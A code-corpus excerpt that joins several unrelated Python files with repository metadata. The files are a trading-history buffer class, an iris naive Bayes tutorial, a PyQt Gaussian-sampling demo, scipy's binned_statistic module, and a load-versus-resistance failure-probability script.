# stock has a gap in its price history.
filled = ffill_digest_frame_from_prior_values(
history_spec.frequency,
history_spec.field,
frame,
self.last_known_prior_values,
raw=True
# Truncate only after we've forward-filled
)
indexer = slice(1 - bar_count, None)
return filled[indexer], digest_panel.current_dates()[indexer]
else:
indexer = slice(1 - bar_count, None)
return frame[indexer, :], digest_panel.current_dates()[indexer]
def buffer_panel_minutes(self,
buffer_panel,
earliest_minute=None,
latest_minute=None,
raw=False):
"""
Get the minutes in @buffer_panel between @earliest_minute and
@latest_minute, inclusive.
@buffer_panel can be a RollingPanel or a plain Panel. If a
RollingPanel is supplied, we call `get_current` to extract a Panel
object.
If no value is specified for @earliest_minute, use all the minutes we
have up until @latest minute.
If no value for @latest_minute is specified, use all values up until
the latest minute.
"""
if isinstance(buffer_panel, RollingPanel):
buffer_panel = buffer_panel.get_current(start=earliest_minute,
end=latest_minute,
raw=raw)
return buffer_panel
# Using .ix here rather than .loc because loc requires that the keys
# are actually in the index, whereas .ix returns all the values between
# earliest_minute and latest_minute, which is what we want.
return buffer_panel.ix[:, earliest_minute:latest_minute, :]
def frame_from_bardata(self, data, algo_dt):
"""
Create a DataFrame from the given BarData and algo dt.
"""
data = data._data
frame_data = np.empty((len(self.fields), len(self.sids))) * np.nan
for j, sid in enumerate(self.sids):
sid_data = data.get(sid)
if not sid_data:
continue
if algo_dt != sid_data['dt']:
continue
for i, field in enumerate(self.fields):
frame_data[i, j] = sid_data.get(field, np.nan)
return pd.DataFrame(
frame_data,
index=self.fields.copy(),
columns=self.sids.copy(),
)
def update(self, data, algo_dt):
"""
Takes the bar at @algo_dt's @data, checks to see if we need to roll any
new digests, then adds new data to the buffer panel.
"""
frame = self.frame_from_bardata(data, algo_dt)
self.update_last_known_values()
self.update_digest_panels(algo_dt, self.buffer_panel)
self.buffer_panel.add_frame(algo_dt, frame)
def update_digest_panels(self, algo_dt, buffer_panel, freq_filter=None):
"""
Check whether @algo_dt is greater than cur_window_close for any of our
frequencies. If so, roll a digest for that frequency using data drawn
from @buffer panel and insert it into the appropriate digest panels.
If @freq_filter is specified, only use the given data to update
frequencies on which the filter returns True.
This takes `buffer_panel` as an argument rather than using
self.buffer_panel so that this method can be used to add supplemental
data from an external source.
"""
for frequency in filter(freq_filter, self.unique_frequencies):
# We don't keep a digest panel if we only have a length-1 history
# spec for a given frequency
digest_panel = self.digest_panels.get(frequency, None)
while algo_dt > self.cur_window_closes[frequency]:
earliest_minute = self.cur_window_starts[frequency]
latest_minute = self.cur_window_closes[frequency]
minutes_to_process = self.buffer_panel_minutes(
buffer_panel,
earliest_minute=earliest_minute,
latest_minute=latest_minute,
raw=True
)
if digest_panel is not None:
# Create a digest from minutes_to_process and add it to
# digest_panel.
digest_frame = self.create_new_digest_frame(
minutes_to_process,
self.fields,
self.sids
)
digest_panel.add_frame(
latest_minute,
digest_frame,
self.fields,
self.sids
)
# Update panel start/close for this frequency.
self.cur_window_starts[frequency] = \
frequency.next_window_start(latest_minute)
self.cur_window_closes[frequency] = \
frequency.window_close(self.cur_window_starts[frequency])
def frame_to_series(self, field, frame, columns=None):
"""
Convert a frame with a DatetimeIndex and sid columns into a series with
a sid index, using the aggregator defined by the given field.
"""
if isinstance(frame, pd.DataFrame):
columns = frame.columns
frame = frame.values
if not len(frame):
return pd.Series(
data=(0 if field == 'volume' else np.nan),
index=columns,
).values
if field in ['price', 'close_price']:
# shortcircuit for full last row
vals = frame[-1]
if np.all(~np.isnan(vals)):
return vals
return ffill(frame)[-1]
elif field == 'open_price':
return bfill(frame)[0]
elif field == 'volume':
return np.nansum(frame, axis=0)
elif field == 'high':
return np.nanmax(frame, axis=0)
elif field == 'low':
return np.nanmin(frame, axis=0)
else:
raise ValueError("Unknown field {}".format(field))
def aggregate_ohlcv_panel(self,
fields,
ohlcv_panel,
items=None,
minor_axis=None):
"""
Convert an OHLCV Panel into a DataFrame by aggregating each field's
frame into a Series.
"""
vals = ohlcv_panel
if isinstance(ohlcv_panel, pd.Panel):
vals = ohlcv_panel.values
items = ohlcv_panel.items
minor_axis = ohlcv_panel.minor_axis
data = [
self.frame_to_series(
field,
vals[items.get_loc(field)],
minor_axis
)
for field in fields
]
return np.array(data)
def create_new_digest_frame(self, buffer_minutes, items=None,
minor_axis=None):
"""
Package up minutes in @buffer_minutes into a single digest frame.
"""
return self.aggregate_ohlcv_panel(
self.fields,
buffer_minutes,
items=items,
minor_axis=minor_axis
)
def update_last_known_values(self):
"""
Store the non-NaN values from our oldest frame in each frequency.
"""
ffillable = self.ffillable_fields
if not len(ffillable):
return
for frequency in self.unique_frequencies:
digest_panel = self.digest_panels.get(frequency, None)
if digest_panel:
oldest_known_values = digest_panel.oldest_frame(raw=True)
else:
oldest_known_values = self.buffer_panel.oldest_frame(raw=True)
oldest_vals = oldest_known_values
oldest_columns = self.fields
for field in ffillable:
f_idx = oldest_columns.get_loc(field)
field_vals = oldest_vals[f_idx]
# isnan would be fast, possible to use?
non_nan_sids = np.where(pd.notnull(field_vals))
key = (frequency.freq_str, field)
key_loc = self.last_known_prior_values.index.get_loc(key)
self.last_known_prior_values.values[
key_loc, non_nan_sids
] = field_vals[non_nan_sids]
def get_history(self, history_spec, algo_dt):
"""
Main API used by the algoscript is mapped to this function.
Selects from the overarching history panel the values for the
@history_spec at the given @algo_dt.
"""
field = history_spec.field
do_ffill = history_spec.ffill
# Get our stored values from periods prior to the current period.
digest_frame, index = self.digest_bars(history_spec, do_ffill)
# Get minutes from our buffer panel to build the last row of the
# returned frame.
buffer_panel = self.buffer_panel_minutes(
self.buffer_panel,
earliest_minute=self.cur_window_starts[history_spec.frequency],
raw=True
)
buffer_frame = buffer_panel[self.fields.get_loc(field)]
if do_ffill:
buffer_frame = ffill_buffer_from_prior_values(
history_spec.frequency,
field,
buffer_frame,
digest_frame,
self.last_known_prior_values,
raw=True
)
last_period = self.frame_to_series(field, buffer_frame, self.sids)
return fast_build_history_output(digest_frame,
last_period,
algo_dt,
index=index,
columns=self.sids)
def fast_build_history_output(buffer_frame,
last_period,
algo_dt,
index=None,
columns=None):
"""
Optimized concatenation of DataFrame and Series for use in
HistoryContainer.get_history.
Relies on the fact that the input arrays have compatible shapes.
"""
buffer_values = buffer_frame
if isinstance(buffer_frame, pd.DataFrame):
buffer_values = buffer_frame.values
index = buffer_frame.index
columns = buffer_frame.columns
return pd.DataFrame(
data=np.vstack(
[
buffer_values,
last_period,
]
),
index=fast_append_date_to_index(
index,
pd.Timestamp(algo_dt)
),
columns=columns,
)
def fast_append_date_to_index(index, timestamp):
"""
Append a timestamp to a DatetimeIndex. DatetimeIndex.append does not
appear to work.
"""
return pd.DatetimeIndex(
np.hstack(
[
index.values,
[timestamp.asm8],
]
),
tz='UTC',
)
| apache-2.0 |
qrsforever/workspace | python/learn/sklearn/l1/main.py | 1 | 2408 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# import urllib.request
from numpy import genfromtxt, zeros, array
# pylab 是matplotlib的接口
from pylab import plot, figure, subplot, hist, xlim, show
from sklearn.naive_bayes import GaussianNB
# url = 'http://aima.cs.berkeley.edu/data/iris.csv'
# u = urllib.request.urlopen(url)
# localFile = open('iris.csv', 'w')
# mybytes = u.read()
# mystr = mybytes.decode('utf8')
# localFile.write(mystr)
# localFile.close()
# 花萼长, 花瓣长, 花萼宽, 花瓣宽
# 5.1, 3.5, 1.4, 0.2, setosa
data = genfromtxt('iris.csv', delimiter=',', usecols=(0,1,2,3))
# print(data)
# print(data.size)
# 通过shape获取数据集大小
# print(data.shape)
target = genfromtxt('iris.csv', delimiter=',', usecols=(4,), dtype=str)
# print(target)
# print(target.shape)
# 样本集合 {'virginica', 'setosa', 'versicolor'}
# print(set(target))
# 返回布尔类型数组
# print(target=='setosa')))))))))))))))))
# print(data[target=='setosa', 0])
# 二维散点图
plot(data[target=='setosa', 0], data[target=='setosa', 2], 'bo')
plot(data[target=='virginica', 0], data[target=='virginica', 2], 'ro')
plot(data[target=='versicolor', 0], data[target=='versicolor', 2], 'go')
# show()
# 特性直方图
xmin = min(data[:, 0])
xmax = max(data[:, 0])
print(xmin, xmax)
figure()
# 4行1列 第一列
subplot(411)
# hist函数,给定一堆数据,统计数据在某一值的个数。plot是给定横/纵坐标向量,描绘点列。
hist(data[target=='setosa', 0], color='b', alpha=.7)
xlim(xmin, xmax)
subplot(412)
hist(data[target=='virginica', 0], color='r', alpha=.7)
xlim(xmin, xmax)
subplot(413)
hist(data[target=='versicolor', 0], color='g', alpha=.7)
xlim(xmin, xmax)
subplot(414)
hist(data[:, 0], color='y', alpha=.7)
xlim(xmin, xmax)
# show()
# 把字符串数组转型成整型数据 (类别)
t = zeros(len(target))
t[target == 'setosa'] = 1
t[target == 'virginica'] = 2
t[target == 'versicolor'] = 3
# 分类: 高斯朴素贝叶斯(http://www.cnblogs.com/pinard/p/6074222.html)
classifier = GaussianNB()
classifier.fit(data, t)
print(data)
print(t)
print(classifier.predict(data))
# 模拟数据(修改data中的最后一条)
test=array([5.7, 2.8, 5.3, 2.0])
# 转换为二维
# print(test.reshape(1, -1))
print(classifier.predict(test.reshape(1, -1)))
# 学习来源: http://python.jobbole.com/83563/
| mit |
kit-cel/lecture-examples | wt/uebung/u5_2D_gaussian.py | 1 | 5513 | #!/usr/bin/env python3
"""
Simulation einer 2D Normalverteilung. Gezeigt werden neben zuf.
Realisierungen auch die Höhenlinie der Dichte für K=9.
"""
from functools import partial
import numpy as np
import matplotlib as mp
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from PyQt5 import QtWidgets, QtCore
class Canvas(FigureCanvasQTAgg):
"""Ultimately, this is a QWidget"""
def __init__(self, parent=None, width=5, height=4, dpi=100):
"""Creates a figure and axes and draws periodically on it."""
# Create a figure and axes
fig = mp.figure.Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_axes((0.1, 0.1, 0.85, 0.85))
self.axes.set_aspect('equal')
# Initialize widget and update timer
super(Canvas, self).__init__(fig)
self.setParent(parent)
self.setSizePolicy(QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
self.updateGeometry()
# plot parameter defaults
self.sigma1 = self.sigma2 = 1.0
self.rho = 0
self.points_per_update = 100
# plot data
self.reset()
self.plot_gaussian_samples()
draw_timer = QtCore.QTimer(self)
draw_timer.timeout.connect(self.plot_gaussian_samples)
draw_timer.start(100)
clear_timer = QtCore.QTimer(self)
clear_timer.timeout.connect(self.reset)
clear_timer.start(20 * 1000)
def set_param(self, name, value):
"""Update a plot parameter, clear axes"""
setattr(self, name, value)
self.reset()
def reset(self):
"""Draw the theoretical contour line"""
self.axes.clear()
self.axes.set_xlim(-6, 6)
self.axes.set_ylim(-5, 5)
self.draw_contour_line()
def draw_contour_line(self):
"""Draw the theoretical contour line"""
# get parameters and math functions
o1, o2, r = self.sigma1, self.sigma2, self.rho
sqrt, sin, cos, pi = np.sqrt, np.sin, np.cos, np.pi
# calculate ellipse parameters
K = 3 ** 2
g = 0.5 * np.arctan(2 * r * o1 * o2 / (o2**2 - o1**2)) \
if o1 != o2 else pi/4
a = o1 * o2 * sqrt(K * (1 - r**2) / (
(o1 * sin(g)) ** 2 +
(o2 * cos(g)) ** 2 +
2 * r * o1 * o2 * sin(g) * cos(g)
))
b = o1 * o2 * sqrt(K * (1 - r**2) / (
(o1 * cos(g)) ** 2 +
(o2 * sin(g)) ** 2 -
2 * r * o1 * o2 * sin(g) * cos(g)
))
# add contour line (ellipse)
self.axes.add_artist(mp.patches.Ellipse(
xy=(0, 0), width=2 * a, height=2 * b, angle=-180 / pi * g,
facecolor='none', edgecolor='r', zorder=2, linewidth=2
))
self.draw()
def plot_gaussian_samples(self):
"""Put some samples of the current distribution on the axes"""
o1, o2, r = self.sigma1, self.sigma2, self.rho
# get two std norm distributed vectors
x, y = np.random.normal(0, 1, (2, self.points_per_update))
# scaling parameters
r1, r2 = np.sqrt((1 + r) / 2), np.sqrt((1 - r) / 2)
# mix the random vectors to get desired correlation
x, y = o1 * (x * r1 + y * r2), o2 * (x * r1 - y * r2)
# plot and draw
self.axes.plot(x, y, 'ko', zorder=1, alpha=0.5, ms=2)
self.draw()
class FigureCanvasWithControls(QtWidgets.QWidget):
def __init__(self):
super(FigureCanvasWithControls, self).__init__()
layout = QtWidgets.QVBoxLayout(self)
canvas = Canvas(self, width=5, height=4, dpi=100)
params = (('sigma1', 0.1, 2.0, 1.0),
('sigma2', 0.1, 2.0, 1.0),
('rho', -0.99, 0.99, 0.0))
# create a control for each figure parameter
for name, lo, hi, default in params:
row = QtWidgets.QHBoxLayout()
layout.addLayout(row)
# label
label = QtWidgets.QLabel(name)
label.setMinimumWidth(50)
label.setAlignment(QtCore.Qt.AlignRight)
row.addWidget(label, 0)
# value slider
slider = QtWidgets.QSlider(QtCore.Qt.Horizontal, self)
slider.setRange(0, 200)
slider.setSingleStep(2)
slider.setPageStep(10)
row.addWidget(slider, 1)
# value display
text = QtWidgets.QLineEdit()
text.setReadOnly(True)
text.setMaximumWidth(50)
text.setFocusPolicy(QtCore.Qt.NoFocus)
text.setAlignment(QtCore.Qt.AlignRight)
row.addWidget(text, 0)
def update(name, lo, hi, text, value):
"""Convert int slider value to target range"""
value = value / slider.maximum() * (hi - lo) + lo
canvas.set_param(name, value)
text.setText("{:.2f}".format(value))
# update figure canvas on value change
slider.valueChanged.connect(partial(update, name, lo, hi, text))
slider.setValue(round((default - lo) / (hi - lo) * slider.maximum()))
layout.addWidget(canvas)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
win = FigureCanvasWithControls()
win.show()
sys.exit(app.exec_())
| gpl-2.0 |
FRidh/scipy | scipy/stats/_binned_statistic.py | 17 | 17622 | from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy._lib.six import callable
from collections import namedtuple
def binned_statistic(x, values, statistic='mean',
bins=10, range=None):
"""
Compute a binned statistic for a set of data.
This is a generalization of a histogram function. A histogram divides
the space into bins, and returns the count of the number of points in
each bin. This function allows the computation of the sum, mean, median,
or other statistic of the values within each bin.
Parameters
----------
x : array_like
A sequence of values to be binned.
values : array_like
The values on which the statistic will be computed. This must be
the same shape as `x`.
statistic : string or callable, optional
The statistic to compute (default is 'mean').
The following statistics are available:
* 'mean' : compute the mean of values for points within each bin.
Empty bins will be represented by NaN.
* 'median' : compute the median of values for points within each
bin. Empty bins will be represented by NaN.
* 'count' : compute the count of points within each bin. This is
identical to an unweighted histogram. `values` array is not
referenced.
* 'sum' : compute the sum of values for points within each bin.
This is identical to a weighted histogram.
* function : a user-defined function which takes a 1D array of
values, and outputs a single numerical statistic. This function
will be called on the values in each bin. Empty bins will be
represented by function([]), or NaN if this returns an error.
bins : int or sequence of scalars, optional
If `bins` is an int, it defines the number of equal-width bins in the
given range (10 by default). If `bins` is a sequence, it defines the
bin edges, including the rightmost edge, allowing for non-uniform bin
widths. Values in `x` that are smaller than lowest bin edge are
assigned to bin number 0, values beyond the highest bin are assigned to
``bins[-1]``.
range : (float, float) or [(float, float)], optional
The lower and upper range of the bins. If not provided, range
is simply ``(x.min(), x.max())``. Values outside the range are
ignored.
Returns
-------
statistic : array
The values of the selected statistic in each bin.
bin_edges : array of dtype float
Return the bin edges ``(length(statistic)+1)``.
binnumber : 1-D ndarray of ints
This assigns to each observation an integer that represents the bin
in which this observation falls. Array has the same length as values.
See Also
--------
numpy.histogram, binned_statistic_2d, binned_statistic_dd
Notes
-----
All but the last (righthand-most) bin is half-open. In other words, if
`bins` is ``[1, 2, 3, 4]``, then the first bin is ``[1, 2)`` (including 1,
but excluding 2) and the second ``[2, 3)``. The last bin, however, is
``[3, 4]``, which *includes* 4.
.. versionadded:: 0.11.0
Examples
--------
>>> from scipy import stats
>>> import matplotlib.pyplot as plt
First a basic example:
>>> stats.binned_statistic([1, 2, 1, 2, 4], np.arange(5), statistic='mean',
... bins=3)
(array([ 1., 2., 4.]), array([ 1., 2., 3., 4.]), array([1, 2, 1, 2, 3]))
As a second example, we now generate some random data of sailing boat speed
as a function of wind speed, and then determine how fast our boat is for
certain wind speeds:
>>> windspeed = 8 * np.random.rand(500)
>>> boatspeed = .3 * windspeed**.5 + .2 * np.random.rand(500)
>>> bin_means, bin_edges, binnumber = stats.binned_statistic(windspeed,
... boatspeed, statistic='median', bins=[1,2,3,4,5,6,7])
>>> plt.figure()
>>> plt.plot(windspeed, boatspeed, 'b.', label='raw data')
>>> plt.hlines(bin_means, bin_edges[:-1], bin_edges[1:], colors='g', lw=5,
... label='binned statistic of data')
>>> plt.legend()
Now we can use ``binnumber`` to select all datapoints with a windspeed
below 1:
>>> low_boatspeed = boatspeed[binnumber == 0]
As a final example, we will use ``bin_edges`` and ``binnumber`` to make a
plot of a distribution that shows the mean and distribution around that
mean per bin, on top of a regular histogram and the probability
distribution function:
>>> x = np.linspace(0, 5, num=500)
>>> x_pdf = stats.maxwell.pdf(x)
>>> samples = stats.maxwell.rvs(size=10000)
>>> bin_means, bin_edges, binnumber = stats.binned_statistic(x, x_pdf,
... statistic='mean', bins=25)
>>> bin_width = (bin_edges[1] - bin_edges[0])
>>> bin_centers = bin_edges[1:] - bin_width/2
>>> plt.figure()
>>> plt.hist(samples, bins=50, normed=True, histtype='stepfilled', alpha=0.2,
... label='histogram of data')
>>> plt.plot(x, x_pdf, 'r-', label='analytical pdf')
>>> plt.hlines(bin_means, bin_edges[:-1], bin_edges[1:], colors='g', lw=2,
... label='binned statistic of data')
>>> plt.plot((binnumber - 0.5) * bin_width, x_pdf, 'g.', alpha=0.5)
>>> plt.legend(fontsize=10)
>>> plt.show()
"""
try:
N = len(bins)
except TypeError:
N = 1
if N != 1:
bins = [np.asarray(bins, float)]
if range is not None:
if len(range) == 2:
range = [range]
medians, edges, xy = binned_statistic_dd([x], values, statistic,
bins, range)
BinnedStatisticResult = namedtuple('BinnedStatisticResult',
('statistic', 'bin_edges', 'binnumber'))
return BinnedStatisticResult(medians, edges[0], xy)
def binned_statistic_2d(x, y, values, statistic='mean',
bins=10, range=None):
"""
Compute a bidimensional binned statistic for a set of data.
This is a generalization of a histogram2d function. A histogram divides
the space into bins, and returns the count of the number of points in
each bin. This function allows the computation of the sum, mean, median,
or other statistic of the values within each bin.
Parameters
----------
x : (N,) array_like
A sequence of values to be binned along the first dimension.
y : (M,) array_like
A sequence of values to be binned along the second dimension.
values : (N,) array_like
The values on which the statistic will be computed. This must be
the same shape as `x`.
statistic : string or callable, optional
The statistic to compute (default is 'mean').
The following statistics are available:
* 'mean' : compute the mean of values for points within each bin.
Empty bins will be represented by NaN.
* 'median' : compute the median of values for points within each
bin. Empty bins will be represented by NaN.
* 'count' : compute the count of points within each bin. This is
identical to an unweighted histogram. `values` array is not
referenced.
* 'sum' : compute the sum of values for points within each bin.
This is identical to a weighted histogram.
* function : a user-defined function which takes a 1D array of
values, and outputs a single numerical statistic. This function
will be called on the values in each bin. Empty bins will be
represented by function([]), or NaN if this returns an error.
bins : int or [int, int] or array_like or [array, array], optional
The bin specification:
* the number of bins for the two dimensions (nx=ny=bins),
* the number of bins in each dimension (nx, ny = bins),
* the bin edges for the two dimensions (x_edges = y_edges = bins),
* the bin edges in each dimension (x_edges, y_edges = bins).
range : (2,2) array_like, optional
The leftmost and rightmost edges of the bins along each dimension
(if not specified explicitly in the `bins` parameters):
[[xmin, xmax], [ymin, ymax]]. All values outside of this range will be
considered outliers and not tallied in the histogram.
Returns
-------
statistic : (nx, ny) ndarray
The values of the selected statistic in each two-dimensional bin
x_edges : (nx + 1) ndarray
The bin edges along the first dimension.
y_edges : (ny + 1) ndarray
The bin edges along the second dimension.
binnumber : 1-D ndarray of ints
This assigns to each observation an integer that represents the bin
in which this observation falls. Array has the same length as `values`.
See Also
--------
numpy.histogram2d, binned_statistic, binned_statistic_dd
Notes
-----
.. versionadded:: 0.11.0
"""
# This code is based on np.histogram2d
try:
N = len(bins)
except TypeError:
N = 1
if N != 1 and N != 2:
xedges = yedges = np.asarray(bins, float)
bins = [xedges, yedges]
medians, edges, xy = binned_statistic_dd([x, y], values, statistic,
bins, range)
BinnedStatistic2dResult = namedtuple('BinnedStatistic2dResult',
('statistic', 'x_edge', 'y_edge',
'binnumber'))
return BinnedStatistic2dResult(medians, edges[0], edges[1], xy)
def binned_statistic_dd(sample, values, statistic='mean',
bins=10, range=None):
"""
Compute a multidimensional binned statistic for a set of data.
This is a generalization of a histogramdd function. A histogram divides
the space into bins, and returns the count of the number of points in
each bin. This function allows the computation of the sum, mean, median,
or other statistic of the values within each bin.
Parameters
----------
sample : array_like
Data to histogram passed as a sequence of D arrays of length N, or
as an (N,D) array.
values : array_like
The values on which the statistic will be computed. This must be
the same shape as x.
statistic : string or callable, optional
The statistic to compute (default is 'mean').
The following statistics are available:
* 'mean' : compute the mean of values for points within each bin.
Empty bins will be represented by NaN.
* 'median' : compute the median of values for points within each
bin. Empty bins will be represented by NaN.
* 'count' : compute the count of points within each bin. This is
identical to an unweighted histogram. `values` array is not
referenced.
* 'sum' : compute the sum of values for points within each bin.
This is identical to a weighted histogram.
* function : a user-defined function which takes a 1D array of
values, and outputs a single numerical statistic. This function
will be called on the values in each bin. Empty bins will be
represented by function([]), or NaN if this returns an error.
bins : sequence or int, optional
The bin specification:
* A sequence of arrays describing the bin edges along each dimension.
* The number of bins for each dimension (nx, ny, ... =bins)
* The number of bins for all dimensions (nx=ny=...=bins).
range : sequence, optional
A sequence of lower and upper bin edges to be used if the edges are
not given explicitely in `bins`. Defaults to the minimum and maximum
values along each dimension.
Returns
-------
statistic : ndarray, shape(nx1, nx2, nx3,...)
The values of the selected statistic in each two-dimensional bin
bin_edges : list of ndarrays
A list of D arrays describing the (nxi + 1) bin edges for each
dimension
binnumber : 1-D ndarray of ints
This assigns to each observation an integer that represents the bin
in which this observation falls. Array has the same length as values.
See Also
--------
np.histogramdd, binned_statistic, binned_statistic_2d
Notes
-----
.. versionadded:: 0.11.0
"""
known_stats = ['mean', 'median', 'count', 'sum', 'std']
if not callable(statistic) and statistic not in known_stats:
raise ValueError('invalid statistic %r' % (statistic,))
# This code is based on np.histogramdd
try:
# Sample is an ND-array.
N, D = sample.shape
except (AttributeError, ValueError):
# Sample is a sequence of 1D arrays.
sample = np.atleast_2d(sample).T
N, D = sample.shape
nbin = np.empty(D, int)
edges = D * [None]
dedges = D * [None]
try:
M = len(bins)
if M != D:
raise AttributeError('The dimension of bins must be equal '
'to the dimension of the sample x.')
except TypeError:
bins = D * [bins]
# Select range for each dimension
# Used only if number of bins is given.
if range is None:
smin = np.atleast_1d(np.array(sample.min(0), float))
smax = np.atleast_1d(np.array(sample.max(0), float))
else:
smin = np.zeros(D)
smax = np.zeros(D)
for i in np.arange(D):
smin[i], smax[i] = range[i]
# Make sure the bins have a finite width.
for i in np.arange(len(smin)):
if smin[i] == smax[i]:
smin[i] = smin[i] - .5
smax[i] = smax[i] + .5
# Create edge arrays
for i in np.arange(D):
if np.isscalar(bins[i]):
nbin[i] = bins[i] + 2 # +2 for outlier bins
edges[i] = np.linspace(smin[i], smax[i], nbin[i] - 1)
else:
edges[i] = np.asarray(bins[i], float)
nbin[i] = len(edges[i]) + 1 # +1 for outlier bins
dedges[i] = np.diff(edges[i])
nbin = np.asarray(nbin)
# Compute the bin number each sample falls into.
Ncount = {}
for i in np.arange(D):
Ncount[i] = np.digitize(sample[:, i], edges[i])
# Using digitize, values that fall on an edge are put in the right bin.
# For the rightmost bin, we want values equal to the right
# edge to be counted in the last bin, and not as an outlier.
for i in np.arange(D):
# Rounding precision
decimal = int(-np.log10(dedges[i].min())) + 6
# Find which points are on the rightmost edge.
on_edge = np.where(np.around(sample[:, i], decimal)
== np.around(edges[i][-1], decimal))[0]
# Shift these points one bin to the left.
Ncount[i][on_edge] -= 1
# Compute the sample indices in the flattened statistic matrix.
ni = nbin.argsort()
xy = np.zeros(N, int)
for i in np.arange(0, D - 1):
xy += Ncount[ni[i]] * nbin[ni[i + 1:]].prod()
xy += Ncount[ni[-1]]
result = np.empty(nbin.prod(), float)
if statistic == 'mean':
result.fill(np.nan)
flatcount = np.bincount(xy, None)
flatsum = np.bincount(xy, values)
a = flatcount.nonzero()
result[a] = flatsum[a] / flatcount[a]
elif statistic == 'std':
result.fill(0)
flatcount = np.bincount(xy, None)
flatsum = np.bincount(xy, values)
flatsum2 = np.bincount(xy, values ** 2)
a = flatcount.nonzero()
result[a] = np.sqrt(flatsum2[a] / flatcount[a]
- (flatsum[a] / flatcount[a]) ** 2)
elif statistic == 'count':
result.fill(0)
flatcount = np.bincount(xy, None)
a = np.arange(len(flatcount))
result[a] = flatcount
elif statistic == 'sum':
result.fill(0)
flatsum = np.bincount(xy, values)
a = np.arange(len(flatsum))
result[a] = flatsum
elif statistic == 'median':
result.fill(np.nan)
for i in np.unique(xy):
result[i] = np.median(values[xy == i])
elif callable(statistic):
with warnings.catch_warnings():
# Numpy generates a warnings for mean/std/... with empty list
warnings.filterwarnings('ignore', category=RuntimeWarning)
old = np.seterr(invalid='ignore')
try:
null = statistic([])
except:
null = np.nan
np.seterr(**old)
result.fill(null)
for i in np.unique(xy):
result[i] = statistic(values[xy == i])
# Shape into a proper matrix
result = result.reshape(np.sort(nbin))
for i in np.arange(nbin.size):
j = ni.argsort()[i]
result = result.swapaxes(i, j)
ni[i], ni[j] = ni[j], ni[i]
# Remove outliers (indices 0 and -1 for each dimension).
core = D * [slice(1, -1)]
result = result[core]
if (result.shape != nbin - 2).any():
raise RuntimeError('Internal Shape Error')
BinnedStatisticddResult = namedtuple('BinnedStatisticddResult',
('statistic', 'bin_edges',
'binnumber'))
return BinnedStatisticddResult(result, edges, xy)
| bsd-3-clause |
haphaeu/yoshimi | spyder_workspace/Statistics/load_vs_resistance.py | 1 | 5065 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 26 13:07:02 2015
@author: rarossi
A structure will fail if subjected to a load greater then its own resistance:
failure := load > resistance
We can safely assume that the load and the resistance are independent.
By means of probability density functions (pdf) and cumulative density
functions (cdf) of the load and of the resistance, is it correct to say that
the probability of failure, can be calculated by the integral of
load_pdf * resistance_cdf ?
Confirmed at
http://stats.stackexchange.com/questions/183743/probability-of-failure
"""
import numpy as np
import scipy as sp
from scipy import stats as ss
from matplotlib import pyplot as plt
# %%
# This below double checks the p_failure calcs.
# Calculate the probability of failure as the integral of the convolution
# of load_pdf and resistance_pdf.
# see http://stats.stackexchange.com/questions/183743/probability-of-failure
# ==> I'm sure this could be done using the numpy convolve function but I
# still don't know how to do it.
def pfail_dblchk(fl, fr, x):
"""fl, fr: pdf functions of load and resistance
x: domain
return the probability of failure
"""
return sp.integrate.quad(
lambda tau: sp.integrate.cumtrapz(fl(x)*fr(tau+x), dx=x[1]-x[0])[-1],
x[0]-(x[-1]-x[0]), 0)[0]
# %% #########################################################
def pfail(fl, Fr, x, dx):
"""Probability of failue given load and resistance.
pfail = integral of load_pdf * resistance_cdf
fl: pdf function of the load
Fr: cfd function of the resistance
x, dx: domain
"""
return sp.integrate.cumtrapz(fl(x)*Fr(x), dx=dx)[-1]
# %%
def optimize_loc(res_loc, res_scale, load_distro, conf_target, eps):
"""Auxiliary function to be used with the scipy.optimize.bisect function
to find the location parameters of the resistance distribution that
matches a required confidence level.
res_loc, res_scale: locations and scale parameters of the distribution
load_distro: load distribution (frozen scipy.stats distribution)
conf_target: confidence level target
eps: limit integration domain where load and resistance pdfs are > eps"""
res_distro = ss.gumbel_l(loc=res_loc, scale=res_scale)
x, dx = np.linspace(
min(load_distro.ppf(eps), res_distro.ppf(eps)),
max(load_distro.ppf(1-eps), res_distro.ppf(1-eps)),
2000, retstep=True)
confidence = 1.0 - pfail(load_distro.pdf, res_distro.cdf, x, dx)
return confidence - conf_target
# %%
if __name__ == '__main__':
# input data
conf_target = 0.9 # confidence level of non-failure
load_loc = 100 # location parameter for the load distribution
load_scale = 5 # scale parameter for the load distribution
res_scale = 3.5 # scale parameter for the resistance distribution
eps = 1e-8 # domain = pdf > eps, for load and resistance
# frozen load distribution
load_distro = ss.gumbel_r(loc=load_loc, scale=load_scale)
# finds the location parameter for the resistance distribution that
# gives the required conf_target
res_loc = sp.optimize.bisect(optimize_loc, load_loc,
load_distro.ppf(1-eps),
args=(res_scale, load_distro,
conf_target, eps))
# frozen resistance distribution
res_distro = ss.gumbel_l(loc=res_loc, scale=res_scale)
# recalculates the domain and the confidence level
x, dx = np.linspace(min(load_distro.ppf(eps), res_distro.ppf(eps)),
max(load_distro.ppf(1-eps), res_distro.ppf(1-eps)),
200, retstep=True)
confidence = 1.0 - pfail(load_distro.pdf, res_distro.cdf, x, dx)
# %% plotting
plt.plot(x, load_distro.pdf(x), label='load pdf')
plt.plot(x, res_distro.pdf(x), label='resistance pdf')
plt.grid()
plt.legend(loc='best')
plt.show()
print('Confidence %.3f%%' % (100*confidence))
pfailure = pfail_dblchk(load_distro.pdf, res_distro.pdf, x)
print('Dbl check %.3f%%' % (100*(1-pfailure)))
"""
Tentando resolver integral load_pdf * res_cdf analiticamente...
\\
\\\text{Assuming Gumbel distribution.} \\
f: PDF \\
F: CDF \\
\\\text{The load is likely to be right skewed:}
\\
f_l(x) = \frac{1}{\beta} e^{-(z+e^{-z})} \\
F_l(x) = e^{-e^{-z}} \\
z = \frac{x-\mu}{\beta}
\\\\\text{The resistance is likely to be left skewed:} \\
f_r(x)= \frac{1}{\beta} e^{(z-e^z)} \\
F_r(x) = 1 - e^{-e^z} \\
\\\\\text{The probability of failure is:} \\
p_{fail} = \int_{-\infty}^\infty f_{load}(x) F_{res} (x) dx \\
= \int_{-\infty}^\infty
\frac{1}{\beta_l} e^{-(z+e^{-z_l})}
\big( 1 - e^{-e^z_r} \big) dx \\
